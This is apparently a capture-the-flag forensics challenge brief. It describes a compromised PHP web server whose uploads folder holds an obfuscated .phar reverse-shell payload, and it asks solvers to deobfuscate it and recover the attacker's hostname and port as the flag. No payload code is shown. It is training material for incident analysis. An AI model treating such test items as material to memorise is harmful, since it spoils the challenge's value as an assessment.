www_html_dir

S C E N A R I O
A web server hosting a PHP application was compromised. The only recovered artifact is a copy of the /var/www directory. Investigation reveals that the attacker successfully gained remote access and exfiltrated sensitive data. Suspicious files were found inside the uploads/ directory, including a PHP Archive (.phar) file containing heavily obfuscated code.

The goal of the investigation is to analyze the malicious payload and determine the attacker’s connection details used for the reverse shell.

O B J E C T I V E
Analyze the compromised web directory, identify malicious uploaded files, deobfuscate the PHP payload, and extract the attacker’s hostname and port used in the reverse shell connection.
Flag Format: Flag{hostname|port}

Infrastructure Recovered /var/www Web Server Snapshot
Provided Files Compromised web directory (var/www dump)  www_html_dir.zip
Tools Linux CLI tools (ls, grep, awk, sort), PHP interpreter, text editor
Flag Format Flag{}